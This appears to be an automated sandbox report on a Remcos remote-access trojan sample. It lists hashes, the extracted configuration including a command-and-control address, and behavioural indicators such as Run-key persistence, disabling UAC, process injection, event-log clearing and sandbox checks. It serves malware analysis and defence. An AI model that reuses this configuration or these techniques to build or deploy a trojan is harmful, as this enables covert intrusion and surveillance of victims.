Analysis
-
max time kernel
128s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 19:37
Behavioral task
behavioral1
Sample
stub.exe
Resource
win10v2004-20240802-en
General
-
Target
stub.exe
-
Size
483KB
-
MD5
f1afd76730a4e93f02f5a0daeb633bbe
-
SHA1
4c9f2260dfb5ece37ccaf4243d88de9e936bcbc1
-
SHA256
a83a7031d0e70716aec25fd334e0dea863b3696eb374bf0546e9948bccfbd84a
-
SHA512
d353953d07f9a987909d8cfe43e7a127c3f381560a3ced54bf848f107664f4c4b4682e9f3c7c7188abaef2b75686357b836319359807d7847dd4070a28a6a07e
-
SSDEEP
6144:wTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZBAXccr9T4:wTlrYw1RUh3NFn+N5WfIQIjbs/ZBuT4
Malware Config
Extracted
remcos
RemoteHost
outside-sand.gl.at.ply.gg:31300
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
$77-system32
-
copy_folder
Remcos
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-MR41I1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 1284 created 616 1284 powershell.EXE 5 PID 3188 created 616 3188 powershell.EXE 5 PID 2996 created 616 2996 powershell.EXE 5 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Adds policy Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" stub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run stub.exe -
Deletes itself 1 IoCs
pid Process 1548 iexplore.exe -
Executes dropped EXE 3 IoCs
pid Process 1080 Install.exe 3772 Install.exe 4244 Install.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" stub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" stub.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-MR41I1 = "\"C:\\ProgramData\\Remcos\\$77-system32\"" iexplore.exe -
pid Process 1284 powershell.EXE 3188 powershell.EXE 2996 powershell.EXE -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4112 set thread context of 1548 4112 stub.exe 86 PID 1548 set thread context of 1272 1548 iexplore.exe 88 PID 1284 set thread context of 4544 1284 powershell.EXE 108 PID 3188 set thread context of 5000 3188 powershell.EXE 116 PID 2996 set thread context of 3456 2996 powershell.EXE 121 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={426AAEAB-9667-401F-8C08-F5B952D4AA83}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE -
Modifies registry class 48 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000f88c8568d7e4da019db685a76ffdda01bc2b52ae6ffdda0114000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE -
Modifies registry key 1 TTPs 2 IoCs
pid Process 5076 reg.exe 2564 reg.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3388 Explorer.EXE 3388 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
